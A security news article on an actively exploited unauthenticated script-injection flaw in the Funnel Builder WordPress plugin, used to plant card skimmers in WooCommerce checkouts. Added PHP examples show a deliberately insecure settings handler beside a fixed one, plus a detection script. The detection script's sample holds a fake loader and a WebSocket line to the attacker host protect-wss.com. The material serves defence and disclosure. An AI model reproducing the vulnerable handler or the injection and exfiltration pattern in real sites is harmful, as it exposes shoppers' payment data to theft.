
Funnel Builder Plugin Bug Steals Credit Cards

A critical vulnerability in the Funnel Builder WordPress plugin is being actively exploited to inject payment card skimmers into WooCommerce checkouts. Update now.

More than 40,000 websites run the Funnel Builder plugin for WordPress. As of May 16, 2026, every single one that hasn’t updated to version 3.15.0.3 is potentially handing over customer credit card numbers, CVVs, and billing addresses to attackers. That’s not hypothetical. It’s happening right now.

Key Takeaways

  • The Funnel Builder plugin for WordPress had an unauthenticated vulnerability allowing arbitrary JavaScript injection into checkout pages.
  • All versions before 3.15.0.3, released on May 15, 2026, are affected.
  • The exploit lets attackers insert a credit card skimmer disguised as a fake Google Analytics script from analytics-reports[.]com.
  • Sansec, an e-commerce security firm, detected live attacks injecting code that opens a WebSocket to wss://protect-wss[.]com/ws.
  • Attackers steal full payment card data, including CVV and billing address — the exact combo used in high-value carding fraud.

How the Credit Card Skimmer Works

The flaw isn’t in some obscure third-party module. It’s baked into the core functionality of Funnel Builder, a tool designed to optimize conversions, not break them. And yet, that’s exactly what it’s doing — breaking trust, one checkout at a time.

Funnel Builder, developed by FunnelKit, lets site owners customize WooCommerce checkout flows. Things like one-click upsells, branded landing pages, and A/B testing are its bread and butter. But it also includes a feature called “External Scripts” — a field where admins can inject custom JavaScript for tracking, analytics, or integrations.

Here’s where it goes wrong: that field wasn’t secured. There was no authentication check. No capability validation. Just a public endpoint exposed to anyone who knew where to look. And attackers did.

An unauthenticated user could POST data directly to the checkout settings, modifying the External Scripts field remotely. That’s not just bad practice — it’s a fundamental failure in basic web security. You don’t let the internet rewrite your site’s JavaScript without asking.

Once injected, the malicious snippet loads jquery-lib.js from analytics-reports[.]com — a domain that doesn’t belong to Google, despite the naming. The script then establishes a WebSocket connection to wss://protect-wss[.]com/ws, a server under attacker control.

From there, the skimmer springs to life. When a customer enters their card number, CVV, and billing address, the malware captures it all. It doesn’t just log keystrokes or scrape form fields — it waits, watches, and exfiltrates the data in real time. The payload is dynamic, meaning the skimmer code delivered can be tailored per site, making detection harder.

Why This Skimmer Is Worse Than Most

Most Magecart-style attacks rely on supply chain compromises or stolen admin credentials. This one? It’s permissionless. You don’t need a password. You don’t need to phish anyone. You just send a POST request to a known endpoint and — boom — you’re injecting code into tens of thousands of live checkout pages.

And because the injected script masquerades as a Google Tag Manager snippet, it flies under the radar. Standard content security policies? They often allow Google Analytics. Site owners reviewing their scripts? They might see “jquery-lib.js” and think, “Yeah, that’s probably legit.”

But it’s not. It’s a credit card skimmer with a clean coat of digital paint.

  • Target: WooCommerce checkout forms
  • Injection method: Unauthenticated POST to exposed endpoint
  • Delivery: Fake Google Analytics script (analytics-reports[.]com/wss/jquery-lib.js)
  • Exfiltration: WebSocket to wss://protect-wss[.]com/ws
  • Data stolen: Full card number, CVV, name, billing address
  • Active since: Detected in the wild as of May 15, 2026

FunnelKit’s Patch Was a Day Late

Version 3.15.0.3 dropped on May 15, 2026 — the same day Sansec started sounding the alarm. That means for however long the exploit had been active before detection, sites were wide open. There’s no public CVE yet. No patch timeline. Just a quiet update and a terse advisory.

The vendor’s note, seen by Sansec, says simply: “we identified an issue that allowed bad actors to inject scripts.” That’s it. No apology. No timeline. No disclosure of how long the vulnerability existed. For a plugin running on 40,000+ sites handling real e-commerce transactions, that level of silence is concerning.

What we do know is that the fix adds authentication checks to the vulnerable endpoint. That’s not a complex refactor — it’s a missing current_user_can() call or nonce verification. Something that should’ve been there from day one.
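The two-step failure the article describes (a settings write reachable without a session, and a handler that never asks who is calling) and the kind of fix it says the patch adds are easiest to see side by side. The snippet below is an added illustration written for this page, not FunnelKit's code; the action name, option name, handler names and the choice of the `manage_woocommerce` capability are assumptions made for the example, since the plugin's real code path is not shown here.

```php
<?php
// Added example (not FunnelKit's code). Every name below is a hypothetical
// placeholder: demo_* handlers, the "demo_save_external_scripts" AJAX action
// and the "demo_checkout_external_scripts" option.

// --- BEFORE: the anti-pattern the article describes. ---
// Whatever arrives in the POST body is written straight into the option that
// the checkout page later prints as a <script> block. There is no nonce and
// no capability check, so the only thing deciding who may rewrite checkout
// JavaScript is which hooks the function is attached to (see below).
function demo_save_external_scripts_insecure() {
    $scripts = isset( $_POST['external_scripts'] ) ? wp_unslash( $_POST['external_scripts'] ) : '';
    update_option( 'demo_checkout_external_scripts', $scripts );
    wp_send_json_success();
}
// Registering on the "nopriv" hook as well makes admin-ajax.php serve this to
// visitors with no session at all. These two lines are what the fix removes;
// they are left commented out so the file registers only the hardened handler.
// add_action( 'wp_ajax_demo_save_external_scripts',        'demo_save_external_scripts_insecure' );
// add_action( 'wp_ajax_nopriv_demo_save_external_scripts', 'demo_save_external_scripts_insecure' );

// --- AFTER: the same write guarded by a nonce and a capability check. ---
function demo_save_external_scripts_secure() {
    // 1. Nonce: the request must come from a page this site rendered for this
    //    user; check_ajax_referer() stops the request on mismatch.
    check_ajax_referer( 'demo_external_scripts_nonce', 'nonce' );

    // 2. Capability: only users allowed to manage the shop may change script
    //    that executes on the checkout page. wp_send_json_error() exits.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // The field is raw JavaScript by design, so it cannot be "sanitized" into
    // safety; authorization is the only control, which is why it must exist.
    $scripts = isset( $_POST['external_scripts'] ) ? wp_unslash( $_POST['external_scripts'] ) : '';
    update_option( 'demo_checkout_external_scripts', $scripts );
    wp_send_json_success();
}
// Only the authenticated hook is registered; there is no nopriv variant.
add_action( 'wp_ajax_demo_save_external_scripts', 'demo_save_external_scripts_secure' );

// The admin screen that renders the field hands its JavaScript the nonce and
// the AJAX URL, so legitimate saves carry the token the handler requires.
function demo_enqueue_external_scripts_admin() {
    wp_enqueue_script( 'demo-external-scripts', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'demo-external-scripts', 'demoExternalScripts', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'demo_external_scripts_nonce' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'demo_enqueue_external_scripts_admin' );
```

The order of the two checks matters less than their presence: the nonce defeats forged requests riding on an admin's browser, the capability check defeats direct calls from anyone who is not an admin, and dropping the `nopriv` registration removes the anonymous route entirely. Any one of the three would have been an obstacle; the article's point is that none of them was there.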

And yet, it wasn’t. Which raises the question: how many other endpoints in this plugin are exposed? How many other settings can be manipulated without auth? This wasn’t a zero-day discovered in the wild — it was a gaping hole left in plain sight.

Why WordPress Plugin Security Keeps Failing

Let’s be clear: this isn’t the first time a popular WordPress plugin has shipped with critical flaws. It won’t be the last. But the pattern is maddeningly consistent. Developers build features fast, ship them to thousands, and treat security as an afterthought.

Funnel Builder has over 40,000 active installs. Its developer, FunnelKit, markets it as a conversion optimization tool — which means it’s likely used by growth-focused teams who care more about A/B test results than code audits.

And that’s the real problem. The WordPress plugin ecosystem runs on speed, not scrutiny. The barrier to entry is low. The update process is automated. And the assumption — dangerous as it is — is that if something’s on wordpress.org, it’s safe.

But wordpress.org doesn’t vet for security. It checks for malware at upload, sure, but it doesn’t audit code for logic flaws. A plugin can be 100% clean on day one and still have a catastrophic vulnerability baked into its design.

The Risk Isn’t Just Technical — It’s Operational

Even if you update to 3.15.0.3, you’re not out of the woods. The attacker might’ve already added a malicious script. And because the plugin allows arbitrary JavaScript, that script could still be sitting in your settings, quietly stealing data.

That’s why FunnelKit’s advisory tells admins to check Settings > Checkout > External Scripts. But how many will actually do it? How many site owners even know where that menu is?

Most WordPress sites are managed by agencies, freelancers, or overworked marketers. They update plugins when the dashboard says “1 update available.” They don’t audit every field. They don’t monitor network requests. And they definitely don’t have a SOC team watching for WebSocket connections to protect-wss[.]com.

Sansec Found It — But Who Else Did?

Sansec, the e-commerce security company that detected the attack, has a strong track record in spotting Magecart campaigns. But here’s the unsettling part: if they saw it, others did too.

Malicious actors don’t need advanced tools to exploit this. The attack is simple, repeatable, and scalable. A single script could’ve scanned all 40,000+ Funnel Builder sites in hours. How many were compromised before May 15?

There’s no way to know. And that’s the real cost of vulnerabilities like this — not the patch, but the uncertainty. Every merchant using Funnel Builder now has to ask: were we hit? Were our customers’ cards stolen? Is that skimmer still running?

For attackers, this is a goldmine. Full card numbers with CVVs are worth 10x more than numbers alone on dark web markets. They enable online fraud without physical possession of the card. And with billing addresses included, even AVS checks can be bypassed.

“We identified an issue that allowed bad actors to inject scripts.” — FunnelKit security advisory, seen by Sansec

What This Means For You

If you run a WooCommerce store with Funnel Builder, update to 3.15.0.3 now. Don’t wait. Don’t schedule it for later. Do it today. Then go to Settings > Checkout > External Scripts and delete anything suspicious. If you didn’t add it, it doesn’t belong.
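"Delete anything suspicious" is easier with a checklist than with eyeballs, so here is an added defender-side helper written for this page (it is not from the article, Sansec or FunnelKit). It scans a blob of text, such as the External Scripts field value copied out of the admin screen or a saved copy of the checkout page source, for the indicators the report names and for any script or WebSocket host that is not on a site-specific allowlist. The indicator list comes from the article; the sample input and the allowlist are constructed for the example.

```php
<?php
// Added example, not part of the original report. Indicators are written with
// real dots here because that is how they appear in injected content; the
// article defangs them as analytics-reports[.]com and protect-wss[.]com.
const DEMO_SKIMMER_IOCS = array(
    'analytics-reports.com', // host serving the fake "jquery-lib.js"
    'protect-wss.com',       // WebSocket exfiltration host
    'jquery-lib.js',         // file name used by the skimmer loader
);

/** Lower-cased host of a URL, or null for relative or unparsable URLs. */
function demo_host_of( string $url ) : ?string {
    // Protocol-relative URLs ("//host/path") are common in injected snippets.
    if ( strpos( $url, '//' ) === 0 ) {
        $url = 'https:' . $url;
    }
    $host = parse_url( $url, PHP_URL_HOST );
    return is_string( $host ) ? strtolower( $host ) : null;
}

/**
 * Returns a list of human-readable findings; an empty array means nothing
 * matched. $allowed_hosts is the site's own list of hosts that may serve
 * scripts to, or receive WebSocket connections from, the checkout page.
 */
function demo_scan_for_skimmer( string $content, array $allowed_hosts ) : array {
    $findings = array();

    // 1. Exact indicators published for this campaign.
    foreach ( DEMO_SKIMMER_IOCS as $ioc ) {
        if ( stripos( $content, $ioc ) !== false ) {
            $findings[] = "known indicator: {$ioc}";
        }
    }

    // 2. Any <script src="..."> that points off the allowlist.
    if ( preg_match_all( '/<script[^>]+src=["\']([^"\']+)["\']/i', $content, $m ) ) {
        foreach ( $m[1] as $src ) {
            $host = demo_host_of( $src );
            if ( $host !== null && ! in_array( $host, $allowed_hosts, true ) ) {
                $findings[] = "external script from unlisted host: {$host}";
            }
        }
    }

    // 3. Any ws:// or wss:// endpoint off the allowlist, wherever it appears.
    if ( preg_match_all( '/wss?:\/\/[^\s"\'<>]+/i', $content, $m ) ) {
        foreach ( $m[0] as $url ) {
            $host = demo_host_of( $url );
            if ( $host !== null && ! in_array( $host, $allowed_hosts, true ) ) {
                $findings[] = "websocket to unlisted host: {$host}";
            }
        }
    }

    return array_values( array_unique( $findings ) );
}

// Constructed sample shaped like the injection the report describes; it is
// not a real capture. Note how the comment and file name imitate analytics.
$sample = <<<'HTML'
<!-- Google Analytics -->
<script src="https://www.googletagmanager.com/gtag/js?id=G-EXAMPLE"></script>
<script src="https://analytics-reports.com/wss/jquery-lib.js"></script>
<script>var s = new WebSocket("wss://protect-wss.com/ws");</script>
HTML;

$allowed = array( 'www.googletagmanager.com', 'www.google-analytics.com' );

foreach ( demo_scan_for_skimmer( $sample, $allowed ) as $finding ) {
    echo "ALERT: {$finding}\n";
}
```

Run it with `php scan.php` after pasting the field contents into `$sample`, or feed it the option value if you know the plugin's option name. The allowlist is the useful part after the published indicators go stale: a fresh skimmer will use a fresh domain, but it still has to load from somewhere and send data somewhere, and a host you did not add is the signal. The same allowlist, expressed as `script-src` and `connect-src` directives in a Content-Security-Policy header, would have stopped the browser from fetching the loader or opening the WebSocket in the first place; a policy that merely permits "Google" hosts does not cover a look-alike domain, and a site with no policy covers nothing.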

For developers, this is a wake-up call: never expose settings endpoints without authentication. Never assume your users will lock things down. And never ship code that lets attackers inject JavaScript into high-value pages. That’s not a feature — it’s a weapon.

The question isn’t whether this type of flaw will appear again. It’s how many more sites will be breached before the WordPress ecosystem treats plugin security like the critical infrastructure it is.

Sources: BleepingComputer, original report
